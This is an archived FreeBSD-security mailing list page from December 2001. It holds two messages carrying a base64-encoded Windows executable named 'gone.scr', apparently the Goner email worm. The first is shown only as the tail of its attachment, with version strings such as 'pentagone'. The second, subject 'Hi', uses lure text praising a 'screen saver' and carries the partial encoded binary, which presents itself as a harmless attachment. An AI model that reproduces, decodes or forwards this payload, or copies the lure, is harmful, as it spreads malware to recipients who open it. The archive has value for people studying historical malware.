/5YoUgIAYenb1/3/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANVFCjwA
AAAAAAADAAMAAAAoAACADgAAAGgAAIAQAAAAqAAAgAAAAADVRQo8AAAAAAAAAQAxdQAAQAAAgAAA
AADVRQo8AAAAAAAAAQAAAAAAWAAAAOxQAgCoDgAAsAQAAAAAAAAAAAAA1UUKPAAAAAAAAAEAAQAA
AIAAAIAAAAAA1UUKPAAAAAAAAAEAAAAAAJgAAACYXwIAFAAAALAEAAAAAAAAAAAAANVFCjwAAAAA
AAABAAEAAADAAACAAAAAANVFCjwAAAAAAAABAAkEAADYAAAAsF8CADQCAACwBAAAAAAAADgTAgAo
AAAAMAAAAGAAAAABAAgAAAAAAIAKAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAA
AACAAIAAgIAAAMDAwADA3MAA8MqmANTw/wCx4v8AjtT/AGvG/wBIuP8AJar/AACq/wAAktwAAHq5
AABilgAASnMAADJQANTj/wCxx/8Ajqv/AGuP/wBIc/8AJVf/AABV/wAASdwAAD25AAAxlgAAJXMA
ABlQANTU/wCxsf8Ajo7/AGtr/wBISP8AJSX/AAAA/gAAANwAAAC5AAAAlgAAAHMAAABQAOPU/wDH
sf8Aq47/AI9r/wBzSP8AVyX/AFUA/wBJANwAPQC5ADEAlgAlAHMAGQBQAPDU/wDisf8A1I7/AMZr
/wC4SP8AqiX/AKoA/wCSANwAegC5AGIAlgBKAHMAMgBQAP/U/wD/sf8A/47/AP9r/wD/SP8A/yX/
AP4A/gDcANwAuQC5AJYAlgBzAHMAUABQAP/U8AD/seIA/47UAP9rxgD/SLgA/yWqAP8AqgDcAJIA
uQB6AJYAYgBzAEoAUAAyAP/U4wD/sccA/46rAP9rjwD/SHMA/yVXAP8AVQDcAEkAuQA9AJYAMQBz
ACUAUAAZAP/U1AD/sbEA/46OAP9rawD/SEgA/yUlAP4AAADcAAAAuQAAAJYAAABzAAAAUAAAAP/j
1AD/x7EA/6uOAP+PawD/c0gA/1clAP9VAADcSQAAuT0AAJYxAABzJQAAUBkAAP/w1AD/4rEA/9SO
AP/GawD/uEgA/6olAP+qAADckgAAuXoAAJZiAABzSgAAUDIAAP//1AD//7EA//+OAP//awD//0gA
//8lAP7+AADc3AAAubkAAJaWAABzcwAAUFAAAPD/1ADi/7EA1P+OAMb/awC4/0gAqv8lAKr/AACS
3AAAerkAAGKWAABKcwAAMlAAAOP/1ADH/7EAq/+OAI//awBz/0gAV/8lAFX/AABJ3AAAPbkAADGW
AAAlcwAAGVAAANT/1ACx/7EAjv+OAGv/awBI/0gAJf8lAAD+AAAA3AAAALkAAACWAAAAcwAAAFAA
ANT/4wCx/8cAjv+rAGv/jwBI/3MAJf9XAAD/VQAA3EkAALk9AACWMQAAcyUAAFAZANT/8ACx/+IA
jv/UAGv/xgBI/7gAJf+qAAD/qgAA3JIAALl6AACWYgAAc0oAAFAyANT//wCx//8Ajv//AGv//wBI
//8AJf//AAD+/gAA3NwAALm5AACWlgAAc3MAAFBQAPLy8gDm5uYA2traAM7OzgDCwsIAtra2AKqq
qgCenp4AkpKSAIaGhgB6enoAbm5uAGJiYgBWVlYASkpKAD4+PgAyMjIAJiYmABoaGgAODg4A8Pv/
AKSgoACAgIAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAgo6Og+uNgXWBgYGB9fPz84H19YHz9fXz9fT19fX19YH1aYGB
aWlpdHR0f3kAAAAAgo6Og/iBgYHzjYGBgYEAgYGBgQCB9fX19fPz9fT09PWBdXVpaWl0dHR0bmwA
AAAAdo6OdniAgXXz8YGBgYGB9IH19YGB9fX19YH19PT1gYFpaXVpdWl0dHQEbmwAAAAAdo6OdniM
gXXzjY2BgfX19PQAAPPz9fWBgYGB9fWBgWlpaXVpaWl0dHQEbmwAAAAAdo6OdgnvaYGB84GBgYGB
gfX1gfT19fX1gYH19fWBgYFpaXVpaWl0dHRzbXgAAAAAg4KOdgnvgXWBjY2BgYGB9fX184H19fWB
gYH19YGBgXWBaYFpaWl0dARnbXgAAAAACYOCggntgXWBjY2BgYGB9fX18/T19fWBgYGBgYGBgYGB
gYGBaWl0dAR/bXgAAAAACYOOjnftgXWBjWiB9fX19PT19PX19fWB9YGBgYGBgWlpgXV1aWh0dARm
bHgAAAAAg4OOjgntgIGBgWnz84H18/T19fX19fX1gYGBgYGBgWlpgYF1dHR0dARueGsAAAAACYN2
jmrrgIF1gWmN84H19PX19fX19YGB9YGBgYGBgWmBdYGAdHR0dGdteHgAAAAACQmDgoN474F1dYFp
gYH19fX19fX19fWBgYGBgXWBgWmBdYF0dHR0dGdta3gAAAAACQmDg44J74GBdWmB8/SBgYH19fX1
9fWBgYGBgYGBgWlpdXV0dHR0dGdsd3gAAAAACQl3g4OD64CBgXWBgYGBgfX19fX19fX1gYGBaYGB
gWmBdXR0dHR0dIt4d3gAAAAAhISEg46C94x1gYCNgYGBgfX19fX19YH19YHzgWmBgYGBdXR0dHR0
gO13amsAAAAAhISEhAmDCe2AgXWBgYGB9YGBgfX18/X19YGBgYGBgYGBdHR0BHR0f3lqg2sAAAAA
hISECQmDg3iLgIGBgYGBaWn1gYH19YGB9POB9YGBgWlpdHQEBHSA7gmCCQkAAAAAhISECQkJCXd4
i4CBgYGBgWlp9YH19YH1gfOBgYGBgWlpdARnBHSAeXaCdwkAAAAAhISEhIQJeISEhHmMgYGBgYFp
gYH1gQCBaWlpgYFpaWlpdARndHRneHZqCXcAAAAAeISEhXh4hHh4eHh4eoyBgYGBgYGBgXWBaYGB
aYGBgYGBgAQEdHRtd3Z2CYMAAAAAeHh4hHh4eHh5eHgJa2ztaIGBgYGBgYGBaYGBdXWBgYF0BAR0
dPAJgoKDg4MAAAAAeHh4eHh4eHh5eXh4eHdq6411aYGBgXWBaYFpgWmBgYCAdHR0aOpqjo6DppsA
AAAAeHh4hXh4hHh5eXgJePfq7o2BgYGBaYGBaYGBdYGAgICAdIB/6gmCgnZ2pqYAAAAAeHh4eXh4
eHh5eHh57o2NgY2BgXWBgWmBaYFpdHR0gICAf+0JdnZ2goKCpqYAAAAAeXh4eXh4eHh5en+AgY2N
gYGBgXWBgWlpgYFoaHR0Z21sCQmDg4OCjo6apqYAAAAAeXl5eXl4hHh6gIGBgY2BgYGBgWlpgYFp
gXSAdHQE7neCgoODg4OOjpqbpo4AAAAAeXh5eXh4eHh6gHWBgYGBgYGBaYGBdYFpdHQEBHQEbWqO
gwmDg4OOjqamjo4AAAAAeHh5eXl4eHhtgHWBgYGBgWlpaWlpgXV0dHQEBARua4J2CQmDgoOPjpqO
jo4AAAAAeXh5eXl5eHhtgIGBgYGBgWlpaWlpgXV0dHR0BH9sgoIJCYODgoKPjpqOjnYAAAAAeXl5
eXl5eHh5gHVpgYGBaWlpaYFpdXV0BAR0f213goMJCYODgoKCjo6OjoMAAAAAeXl5eXl4eHhtaHWB
aWmBaWlpaXVpaXQEdHSA8HiCdgkJg4OCgoKDgo6Og4MAAAAAeXl5eXl5eHjtgHV1aWmBaWlpdWlp
aXQEdHRneHZ2dwmDgoKCgoKDgoKCg4QAAAAAeXl5eXl4eHh5jHWBaYFpaWl1dWmBaXR0dATvdnZ3
CYOCg4ODgo6OgoJ2g4QAAAAAeXl5eXl5eHh5jIGBgYGBgYFpaWl0dAQEdGdrjnYJCYODg4OCj4+P
goKDhHgAAAAAeXl5eXl5eXh4i4F1gYGBgYFpgXV0dHR0BGdggoIJCXeDg4OCj4+Oj4N3hHgAAAAA
eXl5eXl5eXh4eYuBdWmBgWlpgWlpdAQEdGdggnYJCYODg4OCgo+OjoMJhIQAAAAAeXl5eXl5eXh4
eHmAdWmBgWlpgWlpdAR0dGd4gmoJd4ODg4OCgoKCgoODd4QAAAAAeXl5eXl5eXl4d3l/dXWBgYFp
aYGBdHR0BGd4dnZ3d3d3g4ODgoKDg4ODg3cAAAAAeXl5eXl5eXl4a3l/dHVpaWlpaWh0dGh0dGZr
dnZ3CQl3d4ODg4ODg4N3g4MAAAAAeW16eXl5eXl4a3h6gHWBdHR0dHR0BAR0aG1qgmoJCQkJd4OD
g4ODg4ODg3cAAAAAeXp6eXl5eXl4eHh5boB1dIAEBARzcwR0f2x2ancJCQl3d4ODg4ODg4MJg3cA
AAAAeXp6eXl5eXl5bHhrbGeAdARzc3Nzc3R/bHd3CQkJCQl3d3eDg4ODg3d3CQkAAAAAbXp6eXl5
eXl5eWx4eHl6f3Nzc3Nzf20Jg3cJCQkJCXd3d3d3d3d3d3d3dwkAAAAAbXp6bXl5eXl5eXl5bHhs
eW1tbXlteXh4eAl4d3eEhIR3hISEhHd3d3d3g4QAAAAAbW16bW15eXl5eXl5bHh5eXh4eHl4eHh4
d3d4CXd3dwmEhAmEhHeEhIQJd4QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAA
AP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA
//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD/
/wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//
AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8A
AAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//wAA
AAAAAP//AAAAAAAA//8AAAAAAAD//wAAAAAAAP//AAAAAAAA//8AAAAAAAD//yQTAgAAAAEAAQAw
MAAAAQAIAKgOAAAxdfAQAgA0AjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA
vQTv/gAAAQAAAAAAAwAAAAAAAAADAAAAAAAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAEQAAAAA
AFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAA
AAAJBLAElAEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAcAEAAAEAMAA0ADAAOQAw
ADQAQgAwAAAAUAA2AAEAQwBvAG0AbQBlAG4AdABzAAAAUABvAHcAZQByACAAUAB1AGYAZgAgAGcA
aQByAGwAcwAgAHIAdQBsAHoAIQAgACAAOwA+AAAAAAA0ABQAAQBQAHIAbwBkAHUAYwB0AE4AYQBt
AGUAAAAAAHAAZQBuAHQAYQBnAG8AbgBlAAAANAAUAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAA
AAAwAC4AMAAwAC4AMAAwADAAMwAAADgAFAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAA
ADAALgAwADAALgAwADAAMAAzAAAALAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAG8A
bgBlAAAAAAA8ABIAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAZwBvAG4AZQAu
AHMAYwByAAAAAAAAAAAAAAAAAAAAAAA4YgIAIGICAAAAAAAAAAAAAAAAAEViAgAwYgIAAAAAAAAA
AAAAAAAAAAAAAAAAAABSYgIAYGICAHBiAgAAAAAARQIAgAAAAABLRVJORUwzMi5ETEwATVNWQlZN
NjAuRExMAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFByb2Nlc3MAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

------_=_NextPart_000_01C17D09.195F53E0--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 13:56:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1])
	by hub.freebsd.org (Postfix) with ESMTP id 3EFD537B443
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 13:50:31 -0800 (PST)
Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3])
	by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fB4LoTg06343
	for <freebsd-security@freebsd.org>; Tue, 4 Dec 2001 21:50:29 GMT
Received: (from news@localhost)
	by wolf.isltd.insignia.com (8.9.3/8.9.3) id VAA11624
	for freebsd-security@freebsd.org; Tue, 4 Dec 2001 21:50:27 GMT
From: "Lucey, Bryan" <freebsd-security-local@insignia.com>
To: "local.freebsd.security" <local.freebsd.security@insignia.com>
Subject: Hi
Date: Tue, 4 Dec 2001 13:19:48 -0800
Message-ID: <F098252D3EC7D21191DB00A0C9337ECBD92278@exchange-us.isinc.insignia.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C17D09.67187BC0"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C17D09.67187BC0
Content-Type: text/plain

How are you ?
When I saw this screen saver, I immediately thought about you
I am in a harry, I promise you will love it!


------_=_NextPart_000_01C17D09.67187BC0
Content-Type: application/octet-stream;
	name="gone.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="gone.scr"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA9AHveeWEVjXlhFY15YRWN+n0bjXhhFY0QfhyNfmEVjZB+GI14YRWNUmlj
aHlhFY0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDANVFCjwAAAAAAAAAAOAADwELAQYA
AIAAAAAgAAAAwAEA8EwCAADQAQAAUAIAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABwAgAA
BAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAORhAgCcAAAAAFACAOQR
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGNvZGUAAAAA
AMABAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOB0ZXh0AAAAAACAAAAA0AEAAIAAAAAEAAAA
AAAAAAAAAAAAAABAAADgLnJzcmMAAAAAIAAAAFACAAAUAAAAhAAAAAAAAAAAAAAAAAAAQAAAwAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgCpqamurodRuVgxWwA+2b9/CH1h
EEBIC15ZwxU4uJId22TbT3yB7KQPAG6+T8461759B7gOjY0+/wAMAXaDZV4mKV44Li5eJX17Ii+Q
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
